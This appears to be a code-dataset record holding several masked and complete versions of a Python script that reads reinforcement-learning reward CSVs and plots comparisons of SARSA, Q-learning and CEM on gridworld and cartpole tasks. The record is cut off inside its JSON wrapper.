def draw_multi_err(x, y_map, filename):
labels = list(y_map.keys())
fig, ax = plt.subplots()
plt.xlabel('episode')
plt.ylabel('reward')
for l in labels:
ax.errorbar(np.array(range(x)), y_map[l][0], yerr=y_map[l][1], fmt='o')
plt.legend(loc='lower right')
plt.savefig(filename, dpi=200)
plt.show()
def draw_plot1():
reward, err = read_cp_csvdata(100, 'sarsa_grid_f_1.csv')
draw_plot(reward, err, filename='sarsa_grid.png')
reward, err = read_cp_csvdata(100, 'sarsa_cartpole_f_1.csv')
draw_plot(reward, err, filename='sarsa_cartpole.png')
reward, err = read_cp_csvdata(100, 'qlearning_grid_f_1.csv')
draw_plot(reward, err, filename='qlearning_grid.png')
reward, err = read_cp_csvdata(100, 'qlearning_cartpole_f.csv')
draw_plot(reward, err, filename='qlearning_cartpole.png')
def draw_plot3():
grid_map = {}
cp_map = {}
grid_map['sarsa'] = read_cp_csvdata(100, 'sarsa_grid_f_1.csv')[0]
cp_map['sarsa'] = read_cp_csvdata(100, 'sarsa_cartpole_f_1.csv')[0]
grid_map['qlearning'] = read_cp_csvdata(100, 'qlearning_grid_f_1.csv')[0]
cp_map['qlearning'] = read_cp_csvdata(100, 'qlearning_cartpole_f.csv')[0]
grid_map['cem'] = read_cp_csvdata(100, 'ce_grid.csv')[0]
cp_map['cem'] = read_cp_csvdata(100, 'ce_cartpole.csv')[0]
draw_multi_bar(range(100), grid_map, filename='grid_comparision.png')
draw_multi_bar(range(100), cp_map, filename='cartpole_comparision.png')
def draw_plot4():
sarsagrid_map = {}
sarsacp_map = {}
qgrid_map = {}
qcp_map = {}
sarsagrid_map['epsilon greedy'] = read_cp_csvdata(100, 'sarsa_grid_f_1.csv'
)[0]
sarsagrid_map['softmax'] = read_cp_csvdata(100,
'softmax/sarsa_grid_f_1.csv')[0]
sarsacp_map['epsilon greedy'] = read_cp_csvdata(100,
'sarsa_cartpole_f_1.csv')[0]
sarsacp_map['softmax'] = read_cp_csvdata(100,
'softmax/sarsa_cartpole_f_1.csv')[0]
qgrid_map['epsilon greedy'] = read_cp_csvdata(100, 'qlearning_grid_f_1.csv'
)[0]
qgrid_map['softmax'] = read_cp_csvdata(100,
'softmax/qlearning_grid_f_1.csv')[0]
qcp_map['epsilon greedy'] = read_cp_csvdata(100, 'qlearning_cartpole_f.csv'
)[0]
qcp_map['softmax'] = read_cp_csvdata(100, 'softmax/q_cartpole_f.csv')[0]
draw_multi_bar(range(100), sarsagrid_map, filename='sarsa_grid_se.png')
draw_multi_bar(range(100), sarsacp_map, filename='sarsa_cp_se.png')
draw_multi_bar(range(100), qgrid_map, filename='q_grid_se.png')
draw_multi_bar(range(100), qcp_map, filename='q_cp_se.png')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def save_cp_csvdata(reward, err, filename):
with open(filename, mode='w') as data_file:
data_writer = csv.writer(data_file, delimiter=',', quotechar='"',
quoting=csv.QUOTE_MINIMAL)
data_writer.writerow(['epoch', 'reward', 'error'])
for i in range(reward.shape[0]):
data_writer.writerow([i, reward[i], err[i]])
def read_cp_csvdata(epoch, filename):
reward = np.zeros(epoch)
err = np.zeros(epoch)
with open(filename) as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
line_count = 0
for row in csv_reader:
if line_count == 0:
pass
else:
reward[line_count - 1] = row[1]
err[line_count - 1] = row[2]
line_count += 1
print(f'Processed {line_count} lines.')
return reward, err
def draw_plot(data, error, epoch=100, filename='tests.png'):
fig, ax = plt.subplots()
plt.xlabel('episode')
plt.ylabel('reward')
ax.errorbar(np.array(range(epoch)), data, yerr=error, fmt='o')
plt.savefig(filename, dpi=200)
plt.show()
def draw_multi_bar(x, y_map, filename='result.png'):
labels = list(y_map.keys())
plt.xlabel('episode')
plt.ylabel('reward')
plt.xticks([x.index(0), x.index(49), x.index(99)], [0, 49, 99])
for l in labels:
plt.plot(range(len(x)), y_map[l], linestyle='-', label=l)
plt.legend(loc='lower right')
plt.savefig(filename, dpi=200)
plt.show()
def draw_multi_err(x, y_map, filename):
labels = list(y_map.keys())
fig, ax = plt.subplots()
plt.xlabel('episode')
plt.ylabel('reward')
for l in labels:
ax.errorbar(np.array(range(x)), y_map[l][0], yerr=y_map[l][1], fmt='o')
plt.legend(loc='lower right')
plt.savefig(filename, dpi=200)
plt.show()
def draw_plot1():
reward, err = read_cp_csvdata(100, 'sarsa_grid_f_1.csv')
draw_plot(reward, err, filename='sarsa_grid.png')
reward, err = read_cp_csvdata(100, 'sarsa_cartpole_f_1.csv')
draw_plot(reward, err, filename='sarsa_cartpole.png')
reward, err = read_cp_csvdata(100, 'qlearning_grid_f_1.csv')
draw_plot(reward, err, filename='qlearning_grid.png')
reward, err = read_cp_csvdata(100, 'qlearning_cartpole_f.csv')
draw_plot(reward, err, filename='qlearning_cartpole.png')
def draw_plot3():
grid_map = {}
cp_map = {}
grid_map['sarsa'] = read_cp_csvdata(100, 'sarsa_grid_f_1.csv')[0]
cp_map['sarsa'] = read_cp_csvdata(100, 'sarsa_cartpole_f_1.csv')[0]
grid_map['qlearning'] = read_cp_csvdata(100, 'qlearning_grid_f_1.csv')[0]
cp_map['qlearning'] = read_cp_csvdata(100, 'qlearning_cartpole_f.csv')[0]
grid_map['cem'] = read_cp_csvdata(100, 'ce_grid.csv')[0]
cp_map['cem'] = read_cp_csvdata(100, 'ce_cartpole.csv')[0]
draw_multi_bar(range(100), grid_map, filename='grid_comparision.png')
draw_multi_bar(range(100), cp_map, filename='cartpole_comparision.png')
def draw_plot4():
sarsagrid_map = {}
sarsacp_map = {}
qgrid_map = {}
qcp_map = {}
sarsagrid_map['epsilon greedy'] = read_cp_csvdata(100, 'sarsa_grid_f_1.csv'
)[0]
sarsagrid_map['softmax'] = read_cp_csvdata(100,
'softmax/sarsa_grid_f_1.csv')[0]
sarsacp_map['epsilon greedy'] = read_cp_csvdata(100,
'sarsa_cartpole_f_1.csv')[0]
sarsacp_map['softmax'] = read_cp_csvdata(100,
'softmax/sarsa_cartpole_f_1.csv')[0]
qgrid_map['epsilon greedy'] = read_cp_csvdata(100, 'qlearning_grid_f_1.csv'
)[0]
qgrid_map['softmax'] = read_cp_csvdata(100,
'softmax/qlearning_grid_f_1.csv')[0]
qcp_map['epsilon greedy'] = read_cp_csvdata(100, 'qlearning_cartpole_f.csv'
)[0]
qcp_map['softmax'] = read_cp_csvdata(100, 'softmax/q_cartpole_f.csv')[0]
draw_multi_bar(range(100), sarsagrid_map, filename='sarsa_grid_se.png')
draw_multi_bar(range(100), sarsacp_map, filename='sarsa_cp_se.png')
draw_multi_bar(range(100), qgrid_map, filename='q_grid_se.png')
draw_multi_bar(range(100), qcp_map, filename='q_cp_se.png')
def draw_plot5():
pass
<|reserved_special_token_1|>
import numpy as np
import matplotlib.pyplot as plt
import csv
def save_cp_csvdata(reward, err, filename):
with open(filename, mode='w') as data_file:
data_writer = csv.writer(data_file, delimiter=',', quotechar='"',
quoting=csv.QUOTE_MINIMAL)
data_writer.writerow(['epoch', 'reward', 'error'])
for i in range(reward.shape[0]):
data_writer.writerow([i, reward[i], err[i]])
def read_cp_csvdata(epoch, filename):
reward = np.zeros(epoch)
err = np.zeros(epoch)
with open(filename) as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
line_count = 0
for row in csv_reader:
if line_count == 0:
pass
else:
reward[line_count - 1] = row[1]
err[line_count - 1] = row[2]
line_count += 1
print(f'Processed {line_count} lines.')
return reward, err
def draw_plot(data, error, epoch=100, filename='tests.png'):
fig, ax = plt.subplots()
plt.xlabel('episode')
plt.ylabel('reward')
ax.errorbar(np.array(range(epoch)), data, yerr=error, fmt='o')
plt.savefig(filename, dpi=200)
plt.show()
def draw_multi_bar(x, y_map, filename='result.png'):
labels = list(y_map.keys())
plt.xlabel('episode')
plt.ylabel('reward')
plt.xticks([x.index(0), x.index(49), x.index(99)], [0, 49, 99])
for l in labels:
plt.plot(range(len(x)), y_map[l], linestyle='-', label=l)
plt.legend(loc='lower right')
plt.savefig(filename, dpi=200)
plt.show()
def draw_multi_err(x, y_map, filename):
labels = list(y_map.keys())
fig, ax = plt.subplots()
plt.xlabel('episode')
plt.ylabel('reward')
for l in labels:
ax.errorbar(np.array(range(x)), y_map[l][0], yerr=y_map[l][1], fmt='o')
plt.legend(loc='lower right')
plt.savefig(filename, dpi=200)
plt.show()
def draw_plot1():
reward, err = read_cp_csvdata(100, 'sarsa_grid_f_1.csv')
draw_plot(reward, err, filename='sarsa_grid.png')
reward, err = read_cp_csvdata(100, 'sarsa_cartpole_f_1.csv')
draw_plot(reward, err, filename='sarsa_cartpole.png')
reward, err = read_cp_csvdata(100, 'qlearning_grid_f_1.csv')
draw_plot(reward, err, filename='qlearning_grid.png')
reward, err = read_cp_csvdata(100, 'qlearning_cartpole_f.csv')
draw_plot(reward, err, filename='qlearning_cartpole.png')
def draw_plot3():
grid_map = {}
cp_map = {}
grid_map['sarsa'] = read_cp_csvdata(100, 'sarsa_grid_f_1.csv')[0]
cp_map['sarsa'] = read_cp_csvdata(100, 'sarsa_cartpole_f_1.csv')[0]
grid_map['qlearning'] = read_cp_csvdata(100, 'qlearning_grid_f_1.csv')[0]
cp_map['qlearning'] = read_cp_csvdata(100, 'qlearning_cartpole_f.csv')[0]
grid_map['cem'] = read_cp_csvdata(100, 'ce_grid.csv')[0]
cp_map['cem'] = read_cp_csvdata(100, 'ce_cartpole.csv')[0]
draw_multi_bar(range(100), grid_map, filename='grid_comparision.png')
draw_multi_bar(range(100), cp_map, filename='cartpole_comparision.png')
def draw_plot4():
sarsagrid_map = {}
sarsacp_map = {}
qgrid_map = {}
qcp_map = {}
sarsagrid_map['epsilon greedy'] = read_cp_csvdata(100, 'sarsa_grid_f_1.csv'
)[0]
sarsagrid_map['softmax'] = read_cp_csvdata(100,
'softmax/sarsa_grid_f_1.csv')[0]
sarsacp_map['epsilon greedy'] = read_cp_csvdata(100,
'sarsa_cartpole_f_1.csv')[0]
sarsacp_map['softmax'] = read_cp_csvdata(100,
'softmax/sarsa_cartpole_f_1.csv')[0]
qgrid_map['epsilon greedy'] = read_cp_csvdata(100, 'qlearning_grid_f_1.csv'
)[0]
qgrid_map['softmax'] = read_cp_csvdata(100,
'softmax/qlearning_grid_f_1.csv')[0]
qcp_map['epsilon greedy'] = read_cp_csvdata(100, 'qlearning_cartpole_f.csv'
)[0]
qcp_map['softmax'] = read_cp_csvdata(100, 'softmax/q_cartpole_f.csv')[0]
draw_multi_bar(range(100), sarsagrid_map, filename='sarsa_grid_se.png')
draw_multi_bar(range(100), sarsacp_map, filename='sarsa_cp_se.png')
draw_multi_bar(range(100), qgrid_map, filename='q_grid_se.png')
draw_multi_bar(range(100), qcp_map, filename='q_cp_se.png')
def draw_plot5():
pass
<|reserved_special_token_1|>
import numpy as np
import matplotlib.pyplot as plt
import csv
def save_cp_csvdata(reward, err, filename):
with open(filename, mode='w') as data_file:
data_writer = csv.writer(data_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
data_writer.writerow(['epoch', 'reward', 'error'])
for i in range(reward.shape[0]):
data_writer.writerow([i, reward[i], err[i]])
def read_cp_csvdata(epoch, filename):
reward = np.zeros(epoch)
err = np.zeros(epoch)
with open(filename) as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
line_count = 0
for row in csv_reader:
if line_count == 0:
pass
else:
# print(f'\t{row[0]} works in the {row[1]} department, and was born in {row[2]}.')
reward[line_count-1] = row[1]
err[line_count-1] = row[2]
line_count += 1
print(f'Processed {line_count} lines.')
return reward, err
def draw_plot(data, error, epoch=100, filename='tests.png'):
fig, ax = plt.subplots()
plt.xlabel('episode')
plt.ylabel('reward')
ax.errorbar(np.array(range(epoch)), data, yerr=error, fmt='o')
plt.savefig(filename, dpi=200)
plt.show()
def draw_multi_bar(x, y_map, filename='result.png'):
labels = list(y_map.keys())
plt.xlabel('episode')
plt.ylabel('reward')
plt.xticks([x.index(0), x.index(49), x.index(99)], [0, 49, 99])
for l in labels:
plt.plot(range(len(x)), y_map[l], linestyle='-', label=l)
plt.legend(loc='lower right')
plt.savefig(filename, dpi=200)
plt.show()
def draw_multi_err(x, y_map, filename):
labels = list(y_map.keys())
fig, ax = plt.subplots()
plt.xlabel('episode')
plt.ylabel('reward')
for l in labels:
ax.errorbar(np.array(range(x)), y_map[l][0], yerr=y_map[l][1], fmt='o')
plt.legend(loc='lower right')
plt.savefig(filename, dpi=200)
plt.show()
def draw_plot1():
reward, err = read_cp_csvdata(100, 'sarsa_grid_f_1.csv')
draw_plot(reward, err, filename='sarsa_grid.png')
reward, err = read_cp_csvdata(100, 'sarsa_cartpole_f_1.csv')
draw_plot(reward, err, filename='sarsa_cartpole.png')
reward, err = read_cp_csvdata(100, 'qlearning_grid_f_1.csv')
draw_plot(reward, err, filename='qlearning_grid.png')
reward, err = read_cp_csvdata(100, 'qlearning_cartpole_f.csv')
draw_plot(reward, err, filename='qlearning_cartpole.png')
def draw_plot3():
grid_map = {}
cp_map = {}
grid_map['sarsa'] = read_cp_csvdata(100, 'sarsa_grid_f_1.csv')[0]
cp_map['sarsa'] = read_cp_csvdata(100, 'sarsa_cartpole_f_1.csv')[0]
grid_map['qlearning'] = read_cp_csvdata(100, 'qlearning_grid_f_1.csv')[0]
cp_map['qlearning'] = read_cp_csvdata(100, 'qlearning_cartpole_f.csv')[0]
grid_map['cem'] = read_cp_csvdata(100, 'ce_grid.csv')[0]
cp_map['cem'] = read_cp_csvdata(100, 'ce_cartpole.csv')[0]
draw_multi_bar(range(100), grid_map, filename='grid_comparision.png')
draw_multi_bar(range(100), cp_map, filename='cartpole_comparision.png')
def draw_plot4():
sarsagrid_map = {}
sarsacp_map = {}
qgrid_map = {}
qcp_map = {}
sarsagrid_map['epsilon greedy'] = read_cp_csvdata(100, 'sarsa_grid_f_1.csv')[0]
sarsagrid_map['softmax'] = read_cp_csvdata(100, 'softmax/sarsa_grid_f_1.csv')[0]
sarsacp_map['epsilon greedy'] = read_cp_csvdata(100, 'sarsa_cartpole_f_1.csv')[0]
sarsacp_map['softmax'] = read_cp_csvdata(100, 'softmax/sarsa_cartpole_f_1.csv')[0]
qgrid_map['epsilon greedy'] = read_cp_csvdata(100, 'qlearning_grid_f_1.csv')[0]
qgrid_map['softmax'] = read_cp_csvdata(100, 'softmax/qlearning_grid_f_1.csv')[0]
qcp_map['epsilon greedy'] = read_cp_csvdata(100, 'qlearning_cartpole_f.csv')[0]
qcp_map['softmax'] = read_cp_csvdata(100, 'softmax/q_cartpole_f.csv')[0]
draw_multi_bar(range(100), sarsagrid_map, filename='sarsa_grid_se.png')
draw_multi_bar(range(100), sarsacp_map, filename='sarsa_cp_se.png')
draw_multi_bar(range(100), qgrid_map, filename='q_grid_se.png')
draw_multi_bar(range(100), qcp_map, filename='q_cp_se.png')
def draw_plot5():
pass
# draw_plot1()
|
flexible
|
{
"blob_id": "a91d2f32afdc20516e56036c352cc267c728e886",
"index": 3051,
"step-1": "<mask token>\n\n\ndef save_cp_csvdata(reward, err, filename):\n with open(filename, mode='w') as data_file:\n data_writer = csv.writer(data_file, delimiter=',', quotechar='\"',\n quoting=csv.QUOTE_MINIMAL)\n data_writer.writerow(['epoch', 'reward', 'error'])\n for i in range(reward.shape[0]):\n data_writer.writerow([i, reward[i], err[i]])\n\n\ndef read_cp_csvdata(epoch, filename):\n reward = np.zeros(epoch)\n err = np.zeros(epoch)\n with open(filename) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n line_count = 0\n for row in csv_reader:\n if line_count == 0:\n pass\n else:\n reward[line_count - 1] = row[1]\n err[line_count - 1] = row[2]\n line_count += 1\n print(f'Processed {line_count} lines.')\n return reward, err\n\n\ndef draw_plot(data, error, epoch=100, filename='tests.png'):\n fig, ax = plt.subplots()\n plt.xlabel('episode')\n plt.ylabel('reward')\n ax.errorbar(np.array(range(epoch)), data, yerr=error, fmt='o')\n plt.savefig(filename, dpi=200)\n plt.show()\n\n\ndef draw_multi_bar(x, y_map, filename='result.png'):\n labels = list(y_map.keys())\n plt.xlabel('episode')\n plt.ylabel('reward')\n plt.xticks([x.index(0), x.index(49), x.index(99)], [0, 49, 99])\n for l in labels:\n plt.plot(range(len(x)), y_map[l], linestyle='-', label=l)\n plt.legend(loc='lower right')\n plt.savefig(filename, dpi=200)\n plt.show()\n\n\n<mask token>\n\n\ndef draw_plot3():\n grid_map = {}\n cp_map = {}\n grid_map['sarsa'] = read_cp_csvdata(100, 'sarsa_grid_f_1.csv')[0]\n cp_map['sarsa'] = read_cp_csvdata(100, 'sarsa_cartpole_f_1.csv')[0]\n grid_map['qlearning'] = read_cp_csvdata(100, 'qlearning_grid_f_1.csv')[0]\n cp_map['qlearning'] = read_cp_csvdata(100, 'qlearning_cartpole_f.csv')[0]\n grid_map['cem'] = read_cp_csvdata(100, 'ce_grid.csv')[0]\n cp_map['cem'] = read_cp_csvdata(100, 'ce_cartpole.csv')[0]\n draw_multi_bar(range(100), grid_map, filename='grid_comparision.png')\n draw_multi_bar(range(100), cp_map, filename='cartpole_comparision.png')\n\n\ndef draw_plot4():\n sarsagrid_map = {}\n sarsacp_map = {}\n qgrid_map = {}\n qcp_map = {}\n sarsagrid_map['epsilon greedy'] = read_cp_csvdata(100, 'sarsa_grid_f_1.csv'\n )[0]\n sarsagrid_map['softmax'] = read_cp_csvdata(100,\n 'softmax/sarsa_grid_f_1.csv')[0]\n sarsacp_map['epsilon greedy'] = read_cp_csvdata(100,\n 'sarsa_cartpole_f_1.csv')[0]\n sarsacp_map['softmax'] = read_cp_csvdata(100,\n 'softmax/sarsa_cartpole_f_1.csv')[0]\n qgrid_map['epsilon greedy'] = read_cp_csvdata(100, 'qlearning_grid_f_1.csv'\n )[0]\n qgrid_map['softmax'] = read_cp_csvdata(100,\n 'softmax/qlearning_grid_f_1.csv')[0]\n qcp_map['epsilon greedy'] = read_cp_csvdata(100, 'qlearning_cartpole_f.csv'\n )[0]\n qcp_map['softmax'] = read_cp_csvdata(100, 'softmax/q_cartpole_f.csv')[0]\n draw_multi_bar(range(100), sarsagrid_map, filename='sarsa_grid_se.png')\n draw_multi_bar(range(100), sarsacp_map, filename='sarsa_cp_se.png')\n draw_multi_bar(range(100), qgrid_map, filename='q_grid_se.png')\n draw_multi_bar(range(100), qcp_map, filename='q_cp_se.png')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef save_cp_csvdata(reward, err, filename):\n with open(filename, mode='w') as data_file:\n data_writer = csv.writer(data_file, delimiter=',', quotechar='\"',\n quoting=csv.QUOTE_MINIMAL)\n data_writer.writerow(['epoch', 'reward', 'error'])\n for i in range(reward.shape[0]):\n data_writer.writerow([i, reward[i], err[i]])\n\n\ndef read_cp_csvdata(epoch, filename):\n reward = np.zeros(epoch)\n err = np.zeros(epoch)\n with open(filename) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n line_count = 0\n for row in csv_reader:\n if line_count == 0:\n pass\n else:\n reward[line_count - 1] = row[1]\n err[line_count - 1] = row[2]\n line_count += 1\n print(f'Processed {line_count} lines.')\n return reward, err\n\n\ndef draw_plot(data, error, epoch=100, filename='tests.png'):\n fig, ax = plt.subplots()\n plt.xlabel('episode')\n plt.ylabel('reward')\n ax.errorbar(np.array(range(epoch)), data, yerr=error, fmt='o')\n plt.savefig(filename, dpi=200)\n plt.show()\n\n\ndef draw_multi_bar(x, y_map, filename='result.png'):\n labels = list(y_map.keys())\n plt.xlabel('episode')\n plt.ylabel('reward')\n plt.xticks([x.index(0), x.index(49), x.index(99)], [0, 49, 99])\n for l in labels:\n plt.plot(range(len(x)), y_map[l], linestyle='-', label=l)\n plt.legend(loc='lower right')\n plt.savefig(filename, dpi=200)\n plt.show()\n\n\ndef draw_multi_err(x, y_map, filename):\n labels = list(y_map.keys())\n fig, ax = plt.subplots()\n plt.xlabel('episode')\n plt.ylabel('reward')\n for l in labels:\n ax.errorbar(np.array(range(x)), y_map[l][0], yerr=y_map[l][1], fmt='o')\n plt.legend(loc='lower right')\n plt.savefig(filename, dpi=200)\n plt.show()\n\n\ndef draw_plot1():\n reward, err = read_cp_csvdata(100, 'sarsa_grid_f_1.csv')\n draw_plot(reward, err, filename='sarsa_grid.png')\n reward, err = read_cp_csvdata(100, 'sarsa_cartpole_f_1.csv')\n draw_plot(reward, err, filename='sarsa_cartpole.png')\n reward, err = read_cp_csvdata(100, 'qlearning_grid_f_1.csv')\n draw_plot(reward, err, filename='qlearning_grid.png')\n reward, err = read_cp_csvdata(100, 'qlearning_cartpole_f.csv')\n draw_plot(reward, err, filename='qlearning_cartpole.png')\n\n\ndef draw_plot3():\n grid_map = {}\n cp_map = {}\n grid_map['sarsa'] = read_cp_csvdata(100, 'sarsa_grid_f_1.csv')[0]\n cp_map['sarsa'] = read_cp_csvdata(100, 'sarsa_cartpole_f_1.csv')[0]\n grid_map['qlearning'] = read_cp_csvdata(100, 'qlearning_grid_f_1.csv')[0]\n cp_map['qlearning'] = read_cp_csvdata(100, 'qlearning_cartpole_f.csv')[0]\n grid_map['cem'] = read_cp_csvdata(100, 'ce_grid.csv')[0]\n cp_map['cem'] = read_cp_csvdata(100, 'ce_cartpole.csv')[0]\n draw_multi_bar(range(100), grid_map, filename='grid_comparision.png')\n draw_multi_bar(range(100), cp_map, filename='cartpole_comparision.png')\n\n\ndef draw_plot4():\n sarsagrid_map = {}\n sarsacp_map = {}\n qgrid_map = {}\n qcp_map = {}\n sarsagrid_map['epsilon greedy'] = read_cp_csvdata(100, 'sarsa_grid_f_1.csv'\n )[0]\n sarsagrid_map['softmax'] = read_cp_csvdata(100,\n 'softmax/sarsa_grid_f_1.csv')[0]\n sarsacp_map['epsilon greedy'] = read_cp_csvdata(100,\n 'sarsa_cartpole_f_1.csv')[0]\n sarsacp_map['softmax'] = read_cp_csvdata(100,\n 'softmax/sarsa_cartpole_f_1.csv')[0]\n qgrid_map['epsilon greedy'] = read_cp_csvdata(100, 'qlearning_grid_f_1.csv'\n )[0]\n qgrid_map['softmax'] = read_cp_csvdata(100,\n 'softmax/qlearning_grid_f_1.csv')[0]\n qcp_map['epsilon greedy'] = read_cp_csvdata(100, 'qlearning_cartpole_f.csv'\n )[0]\n qcp_map['softmax'] = read_cp_csvdata(100, 'softmax/q_cartpole_f.csv')[0]\n draw_multi_bar(range(100), sarsagrid_map, filename='sarsa_grid_se.png')\n draw_multi_bar(range(100), sarsacp_map, filename='sarsa_cp_se.png')\n draw_multi_bar(range(100), qgrid_map, filename='q_grid_se.png')\n draw_multi_bar(range(100), qcp_map, filename='q_cp_se.png')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef save_cp_csvdata(reward, err, filename):\n with open(filename, mode='w') as data_file:\n data_writer = csv.writer(data_file, delimiter=',', quotechar='\"',\n quoting=csv.QUOTE_MINIMAL)\n data_writer.writerow(['epoch', 'reward', 'error'])\n for i in range(reward.shape[0]):\n data_writer.writerow([i, reward[i], err[i]])\n\n\ndef read_cp_csvdata(epoch, filename):\n reward = np.zeros(epoch)\n err = np.zeros(epoch)\n with open(filename) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n line_count = 0\n for row in csv_reader:\n if line_count == 0:\n pass\n else:\n reward[line_count - 1] = row[1]\n err[line_count - 1] = row[2]\n line_count += 1\n print(f'Processed {line_count} lines.')\n return reward, err\n\n\ndef draw_plot(data, error, epoch=100, filename='tests.png'):\n fig, ax = plt.subplots()\n plt.xlabel('episode')\n plt.ylabel('reward')\n ax.errorbar(np.array(range(epoch)), data, yerr=error, fmt='o')\n plt.savefig(filename, dpi=200)\n plt.show()\n\n\ndef draw_multi_bar(x, y_map, filename='result.png'):\n labels = list(y_map.keys())\n plt.xlabel('episode')\n plt.ylabel('reward')\n plt.xticks([x.index(0), x.index(49), x.index(99)], [0, 49, 99])\n for l in labels:\n plt.plot(range(len(x)), y_map[l], linestyle='-', label=l)\n plt.legend(loc='lower right')\n plt.savefig(filename, dpi=200)\n plt.show()\n\n\ndef draw_multi_err(x, y_map, filename):\n labels = list(y_map.keys())\n fig, ax = plt.subplots()\n plt.xlabel('episode')\n plt.ylabel('reward')\n for l in labels:\n ax.errorbar(np.array(range(x)), y_map[l][0], yerr=y_map[l][1], fmt='o')\n plt.legend(loc='lower right')\n plt.savefig(filename, dpi=200)\n plt.show()\n\n\ndef draw_plot1():\n reward, err = read_cp_csvdata(100, 'sarsa_grid_f_1.csv')\n draw_plot(reward, err, filename='sarsa_grid.png')\n reward, err = read_cp_csvdata(100, 'sarsa_cartpole_f_1.csv')\n draw_plot(reward, err, filename='sarsa_cartpole.png')\n reward, err = read_cp_csvdata(100, 'qlearning_grid_f_1.csv')\n draw_plot(reward, err, filename='qlearning_grid.png')\n reward, err = read_cp_csvdata(100, 'qlearning_cartpole_f.csv')\n draw_plot(reward, err, filename='qlearning_cartpole.png')\n\n\ndef draw_plot3():\n grid_map = {}\n cp_map = {}\n grid_map['sarsa'] = read_cp_csvdata(100, 'sarsa_grid_f_1.csv')[0]\n cp_map['sarsa'] = read_cp_csvdata(100, 'sarsa_cartpole_f_1.csv')[0]\n grid_map['qlearning'] = read_cp_csvdata(100, 'qlearning_grid_f_1.csv')[0]\n cp_map['qlearning'] = read_cp_csvdata(100, 'qlearning_cartpole_f.csv')[0]\n grid_map['cem'] = read_cp_csvdata(100, 'ce_grid.csv')[0]\n cp_map['cem'] = read_cp_csvdata(100, 'ce_cartpole.csv')[0]\n draw_multi_bar(range(100), grid_map, filename='grid_comparision.png')\n draw_multi_bar(range(100), cp_map, filename='cartpole_comparision.png')\n\n\ndef draw_plot4():\n sarsagrid_map = {}\n sarsacp_map = {}\n qgrid_map = {}\n qcp_map = {}\n sarsagrid_map['epsilon greedy'] = read_cp_csvdata(100, 'sarsa_grid_f_1.csv'\n )[0]\n sarsagrid_map['softmax'] = read_cp_csvdata(100,\n 'softmax/sarsa_grid_f_1.csv')[0]\n sarsacp_map['epsilon greedy'] = read_cp_csvdata(100,\n 'sarsa_cartpole_f_1.csv')[0]\n sarsacp_map['softmax'] = read_cp_csvdata(100,\n 'softmax/sarsa_cartpole_f_1.csv')[0]\n qgrid_map['epsilon greedy'] = read_cp_csvdata(100, 'qlearning_grid_f_1.csv'\n )[0]\n qgrid_map['softmax'] = read_cp_csvdata(100,\n 'softmax/qlearning_grid_f_1.csv')[0]\n qcp_map['epsilon greedy'] = read_cp_csvdata(100, 'qlearning_cartpole_f.csv'\n )[0]\n qcp_map['softmax'] = read_cp_csvdata(100, 'softmax/q_cartpole_f.csv')[0]\n draw_multi_bar(range(100), sarsagrid_map, filename='sarsa_grid_se.png')\n draw_multi_bar(range(100), sarsacp_map, filename='sarsa_cp_se.png')\n draw_multi_bar(range(100), qgrid_map, filename='q_grid_se.png')\n draw_multi_bar(range(100), qcp_map, filename='q_cp_se.png')\n\n\ndef draw_plot5():\n pass\n",
"step-4": "import numpy as np\nimport matplotlib.pyplot as plt\nimport csv\n\n\ndef save_cp_csvdata(reward, err, filename):\n with open(filename, mode='w') as data_file:\n data_writer = csv.writer(data_file, delimiter=',', quotechar='\"',\n quoting=csv.QUOTE_MINIMAL)\n data_writer.writerow(['epoch', 'reward', 'error'])\n for i in range(reward.shape[0]):\n data_writer.writerow([i, reward[i], err[i]])\n\n\ndef read_cp_csvdata(epoch, filename):\n reward = np.zeros(epoch)\n err = np.zeros(epoch)\n with open(filename) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n line_count = 0\n for row in csv_reader:\n if line_count == 0:\n pass\n else:\n reward[line_count - 1] = row[1]\n err[line_count - 1] = row[2]\n line_count += 1\n print(f'Processed {line_count} lines.')\n return reward, err\n\n\ndef draw_plot(data, error, epoch=100, filename='tests.png'):\n fig, ax = plt.subplots()\n plt.xlabel('episode')\n plt.ylabel('reward')\n ax.errorbar(np.array(range(epoch)), data, yerr=error, fmt='o')\n plt.savefig(filename, dpi=200)\n plt.show()\n\n\ndef draw_multi_bar(x, y_map, filename='result.png'):\n labels = list(y_map.keys())\n plt.xlabel('episode')\n plt.ylabel('reward')\n plt.xticks([x.index(0), x.index(49), x.index(99)], [0, 49, 99])\n for l in labels:\n plt.plot(range(len(x)), y_map[l], linestyle='-', label=l)\n plt.legend(loc='lower right')\n plt.savefig(filename, dpi=200)\n plt.show()\n\n\ndef draw_multi_err(x, y_map, filename):\n labels = list(y_map.keys())\n fig, ax = plt.subplots()\n plt.xlabel('episode')\n plt.ylabel('reward')\n for l in labels:\n ax.errorbar(np.array(range(x)), y_map[l][0], yerr=y_map[l][1], fmt='o')\n plt.legend(loc='lower right')\n plt.savefig(filename, dpi=200)\n plt.show()\n\n\ndef draw_plot1():\n reward, err = read_cp_csvdata(100, 'sarsa_grid_f_1.csv')\n draw_plot(reward, err, filename='sarsa_grid.png')\n reward, err = read_cp_csvdata(100, 'sarsa_cartpole_f_1.csv')\n draw_plot(reward, err, filename='sarsa_cartpole.png')\n reward, err = read_cp_csvdata(100, 'qlearning_grid_f_1.csv')\n draw_plot(reward, err, filename='qlearning_grid.png')\n reward, err = read_cp_csvdata(100, 'qlearning_cartpole_f.csv')\n draw_plot(reward, err, filename='qlearning_cartpole.png')\n\n\ndef draw_plot3():\n grid_map = {}\n cp_map = {}\n grid_map['sarsa'] = read_cp_csvdata(100, 'sarsa_grid_f_1.csv')[0]\n cp_map['sarsa'] = read_cp_csvdata(100, 'sarsa_cartpole_f_1.csv')[0]\n grid_map['qlearning'] = read_cp_csvdata(100, 'qlearning_grid_f_1.csv')[0]\n cp_map['qlearning'] = read_cp_csvdata(100, 'qlearning_cartpole_f.csv')[0]\n grid_map['cem'] = read_cp_csvdata(100, 'ce_grid.csv')[0]\n 